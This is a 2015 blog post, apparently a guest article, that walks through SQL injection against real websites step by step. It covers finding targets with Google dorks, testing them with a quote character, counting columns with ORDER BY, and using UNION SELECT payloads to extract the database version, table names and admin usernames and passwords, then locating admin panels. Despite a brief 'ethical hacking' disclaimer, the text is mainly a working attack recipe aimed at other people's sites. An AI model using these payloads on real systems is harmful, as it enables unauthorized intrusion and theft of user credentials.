How to view documents using Visual Studio

View documents in Visual Studio with an amazing tool

Xpath Axes

A very useful trick for automation

Review: Spire.DataExport for .NET

A great tool for exporting data in .NET

How to install Arch Linux, step by step, for VMware Workstation (Part I)

First part of a installation tutorial for this beloved OS

How to setup a local repository in Ubuntu

The steps to have a local repo in Ubuntu

Tuesday, October 6, 2015

Donning the Shoes of A Hacker to know about SQL Injection

The Internet has undoubtedly made knowledge ubiquitous, but along with this it has also generated a lot of vulnerabilities at the same time. There are a lot of malicious users who are in wake to find out the loopholes in your websites so as to attack. On the top now we have SQL injections which are the most effective and invasive way to attack.

You can be a victim, if...

There are a lot of SQL attacks which are being reported daily and there are ample lot of websites which are dependent on data driven designs in order to come up with dynamic content for their readers. As all these dynamic designs are build on MySQL or any other database which is dependent on SQL, wherefore this makes all of them exposed to the danger.

Getting Acquainted

SQL injection attacks  directly hit the database, therefore you need to have quite a good grasp or preliminary knowledge about the same before you start away with it. If you are starting the process you can certainly go for some learning tutorials for beginners which can tell you all that you need to know.

What are we discussing here? 

In this article, we will discuss how to attack a website using SQL injection. Moreover, I am writing this article just to know how these attacks make their way to their website and how can you ensure your safety from them. One must not forget that performing a SQL injection attack is circumventing the law and as we know flouting the rules has its own serious repercussions (so be cautions while performing). This article is a step towards ethical hacking.

Thinking like a hacker: Step wise analysis

* First they ByPass the Logins
* The second step is to access the secret data
* Then they modify the content of the website
* The last step is to shut down their database My SQL server

This was a succinct summary, we will now discuss this in detail.

Step 1: Searching for exposed/ vulnerable websites: 

Google being the king of the search engines works as the holy grail for hackers. In order to find the list of vulnerable websites hacker adopt Google's Dork list. Google dork programmed in a such a way that this it is used for finding hackable websites which uses the power of Google searching. In order to refine your search one can use a lot of tricks, but the best trick is to use “inurl:” command in order to find the websites which are prone to danger.

For example you can type in:

Searching : 
1. Copy any of these commands and paste in the search bar of Google.
2. Google will fetch you a list of web sites.
3. The you need to visit each of the websites to check their vulnerability factor.

Gauging the Vulnerability:

In order to check whether the website is  vulnerable or not ,add a single inverted comma (‘) at the end of websites url and then press enter. (There should be no space between single quotes and number.)

For instance:'

If the webpage displayed on the browser remains unchanged or displays the error message of “page not found” or displays any other webpage, then this website is not hackable.

If after typing this the error message related to sql query comes, then the website is hackable.

For instance, error message such as

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1]

Step 3: Finding the Number of columns in the database:

Now that the hacker is  well aware of the fact that the website is vulnerable, his next move is to find columns existing the database table.

This is not a big task for them as all they need to do is to write “order by n” instead of that inverted comma ( they leave a space between this statement and number) .

Now they keep on changing the numbers starting n from 1, 2, …. till a error message stating “unknown column ” is displayed.

For eg: order by 1 order by 2 order by 3 order by 4

Keep on changing the numbers till an error message stating “unknown column” pops up.

Let us suppose you got an error message on the 8th number, then the number of columns will be “n-1”, i.e. here it will be 7.

This is not an infallible method, thus if this method is not working ,then you can add “-” at the end of this statement

For instance: order by 1--

Step 4: Knowing the Vulnerable columns:

The hackers use the “union select columns_sequence” in order to find out the columns which are prone to danger. Now in this step the “order by n” statement is replaced with this one. After this the id value is swapped with a negative number, i.e. the id = -2, but there might be no need of doing so on some websites.

You also need to change columns_sequence from number from 1 to x-1 without separating them with commas.

For eg:

Let us suppose that the number of columns is 7 ,then the query will be union select 1,2,3,4,5,6,7--

If this trick do not works then you can also try this: and 1=2 union select 1,2,3,4,5,6,7--

Step 5: Fetching the  version, user, database

The third trick is to place “version()” in place of numeral 3.

For eg: and 1=2 union select 1,2,version(),4,5,6,7--

After doing so you will get to see a version 5.0 or 6.3. or similar to this.

Now, to find user() and database() you just need to keep them one by one in the place of version().

For eg: and 1=2 union select 1,2,user(),4,5,6,7-- and 1=2 union select 1,2,database(),4,5,6,7--

Moreover, if the above trick is not working then you can try out this one: and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--

Step 6:  Finding the Table Name

Finding the table name depends on the version of the SQL. So, from the aforementioned query if you have received version 5 or above. Then you need to follow the following steps. Firstly, you need to replace numeral 3 with

 “group_concat(table_name) and add the “from information_schema.tables where table_schema=database()”

You need to use the above query like this: and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--

Using this query will fetch you a list of the names of tables. Then after you need to find a table which is related to user or admin.

After this you need to pick the “admin”table.

If the site is of version 4 or of any other, then you need to guess the names of the tables. This is why it is difficult to perform SQL injection with version 4.

Step 7: Searching the  Column Name

In order to find the name of the column you need to replace  “group_concat(table_name) with “group_concat(column_name)”

and then  add “FROM information_schema.columns WHERE table_name=mysqlchar– in the place of  “from information_schema.tables where table_schema=database()–”

This step is a crucial one, as you need to change the table name to a string type named as MySql CHAR()  and then write it in place of mysqlchar.

Find MysqlChar() for Tablename:
First of all install the HackBar addon:

Now you to need to navigate to the the following path:

Now you need to copy and then paste the code in place if “mysqlchar” present in the URL
For eg: and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Running this will fetch us the list of all the table names:
 admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pas  s,admin_id,admin_name,admin_password,ID_admin,admin_username,username,password..etc..

Now write  group_concat(columnname,0x3a,anothercolumnname) in place of  group_concat(column_name).

Instead of listed columns you need to write down Columname and anothercolumname also.

Then you need to write “from table_name” in place of   “from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)”.

For eg:
    and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--

You won't be lucky all the times and you will get errors stating column not found. Therefore, you need to try other columns as well.

You can find columns of username and passwords.

If a website has accounts of users,  then this can prove to be a golden chicken for hackers.

Step 8: Fetching the Admin panel:

You need to start by trying with url like:

If you are lucky enough, you can get you victims admin url like this, else you can keep on trying with other permutations and combinations.

Author Biography:

Samuel Dawson has shared a great article below on how a SQL injection can be perfomed on a website. Currently he is a involved in converting psd to html files for Designs2html Ltd.